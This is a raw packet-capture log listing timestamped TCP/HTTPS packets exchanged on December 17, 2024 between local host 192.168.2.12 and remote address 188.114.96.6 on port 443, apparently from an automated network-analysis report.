                                                                        Dec 17, 2024 08:38:34.824704885 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:34.824717045 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:34.824795008 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:34.831512928 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:34.831540108 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:34.831814051 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:34.831820965 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:34.831943989 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:34.838063955 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:34.838093042 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:34.838474035 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:34.838481903 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:34.838644028 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:34.845266104 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:34.845288038 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:34.845447063 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:34.845455885 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:34.845999956 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:35.344948053 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:35.344963074 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:35.345026970 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:35.345154047 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:35.345154047 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:35.345165014 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:35.345344067 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:35.346410990 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:35.346427917 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:35.346607924 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:35.346616983 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:35.347002983 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:35.348556042 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:35.348576069 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:35.348635912 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:35.348642111 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:35.348659039 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:35.348751068 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:35.350204945 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:35.350223064 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:35.350265980 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:35.350286007 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:35.350306988 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:35.350560904 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:35.351171017 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:35.351187944 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:35.351249933 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:35.351255894 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:35.351346016 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:35.351346016 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:35.352040052 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:35.352055073 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:35.352096081 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:35.352113962 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:35.352174997 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:35.352911949 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:35.352927923 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:35.353038073 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:35.353043079 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:35.353136063 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:35.353827000 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:35.353842020 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:35.353884935 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:35.353900909 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:35.353914022 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:35.354186058 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:35.363820076 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:35.363842964 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:35.363945007 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:35.363945007 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:35.363955021 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:35.364054918 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:35.366220951 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:35.366240978 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:35.366280079 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:35.366298914 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:35.366379976 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:35.366379976 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:35.367394924 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:35.367412090 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:35.367551088 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:35.367557049 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:35.367686033 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:35.368853092 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:35.368870974 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:35.368956089 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:35.368961096 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:35.368993998 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:35.369110107 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:35.369123936 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:35.369138956 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:35.369184017 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:35.369189024 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:35.369213104 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:35.369239092 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:35.370052099 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:35.370066881 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:35.370182037 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:35.370182037 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:35.370199919 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:35.370239973 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:35.370819092 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:35.370834112 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:35.370913029 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:35.370913029 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:35.370918989 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:35.370979071 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:35.371794939 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:35.371817112 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:35.371979952 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:35.371992111 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:35.372076035 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:35.380896091 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:35.380920887 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:35.381058931 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:35.381059885 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:35.381077051 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:35.381254911 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:35.381766081 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:35.381786108 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:35.381875992 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:35.381875992 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:35.381881952 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:35.381917953 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:35.465277910 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:35.465306044 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:35.465464115 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:35.465464115 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:35.465487003 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:35.465572119 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:35.472332001 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:35.472359896 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:35.472426891 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:35.472434998 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:35.472487926 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:35.472487926 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:35.478940010 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:35.478959084 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:35.479034901 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:35.479042053 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:35.479075909 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:35.479094028 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:35.486120939 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:35.486145020 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:35.486239910 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:35.486255884 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:35.486296892 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:35.492358923 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:35.492391109 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:35.492450953 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:35.492458105 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:35.492604017 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:35.492604017 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:35.498868942 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:35.498895884 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:35.499000072 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:35.499000072 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:35.499021053 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:35.499221087 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:35.566684961 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:35.566714048 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:35.566772938 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:35.566788912 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:35.566838026 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:35.566838026 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:35.572076082 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:35.572092056 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:35.572233915 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:35.572241068 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:35.572288990 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:35.578808069 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:35.578835964 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:35.578876019 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:35.578886032 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:35.578933954 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:35.578948975 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:35.584639072 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:35.584671974 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:35.584779024 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:35.584779024 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:35.584786892 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:35.584960938 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:35.590878963 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:35.590909004 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:35.590964079 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:35.590970039 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:35.591026068 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:35.596648932 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:35.596682072 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:35.596776009 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:35.596792936 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:35.597026110 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:35.602067947 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:35.602092981 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:35.602242947 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:35.602264881 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:35.602314949 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:35.608359098 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:35.608385086 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:35.608525038 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:35.608549118 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:35.608594894 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:35.758126974 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:35.758188009 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:35.758260965 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:35.758275986 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:35.758373976 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:35.758373976 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:35.761925936 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:35.761946917 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:35.762111902 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:35.762111902 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:35.762120962 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:35.762170076 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:35.766671896 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:35.766690969 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:35.766751051 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:35.766757011 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:35.766810894 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:35.766810894 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:35.770510912 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:35.770528078 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:35.770689011 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:35.770694971 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:35.770973921 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:35.775366068 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:35.775392056 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:35.775482893 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:35.775490046 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:35.775500059 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:35.775614977 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:35.779783964 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:35.779812098 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:35.779911041 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:35.779911041 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:35.779921055 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:35.780055046 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:35.783617973 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:35.783638000 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:35.783723116 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:35.783730030 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:35.783796072 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:35.788384914 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:35.788405895 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:35.788799047 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:35.788814068 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:35.789139032 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:35.950429916 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:35.950459003 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:35.950515985 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:35.950536013 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:35.950790882 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:35.950790882 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:35.955101013 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:35.955118895 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:35.955259085 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:35.955265999 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:35.955323935 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:35.958901882 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:35.958928108 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:35.959088087 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:35.959095955 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:35.959209919 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:35.962723970 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:35.962748051 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:35.962940931 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:35.962949038 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:35.963332891 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:35.967559099 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:35.967576981 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:35.967755079 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:35.967762947 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:35.967816114 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:35.971940994 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:35.971965075 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:35.972070932 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:35.972070932 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:35.972079039 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:35.972493887 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:35.976150990 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:35.976169109 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:35.976252079 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:35.976258993 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:35.976315022 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:35.980535984 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:35.980555058 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:35.980752945 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:35.980761051 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:35.980865002 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:36.142838001 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:36.142865896 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:36.142941952 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:36.142961979 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:36.143065929 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:36.143065929 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:36.147440910 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:36.147469044 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:36.147512913 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:36.147520065 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:36.147547007 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:36.147582054 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:36.151294947 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:36.151329041 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:36.151395082 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:36.151395082 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:36.151401043 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:36.151977062 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:36.156092882 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:36.156115055 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:36.156215906 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:36.156222105 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:36.156303883 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:36.159888983 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:36.159912109 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:36.160021067 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:36.160021067 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:36.160027027 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:36.160129070 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:36.164460897 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:36.164493084 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:36.164618969 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:36.164618969 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:36.164624929 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:36.164695024 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:36.168215036 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:36.168247938 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:36.168296099 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:36.168299913 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:36.168375015 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:36.168375015 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:36.172976017 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:36.173015118 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:36.173054934 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:36.173060894 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:36.173135996 CET49716443192.168.2.12188.114.96.6
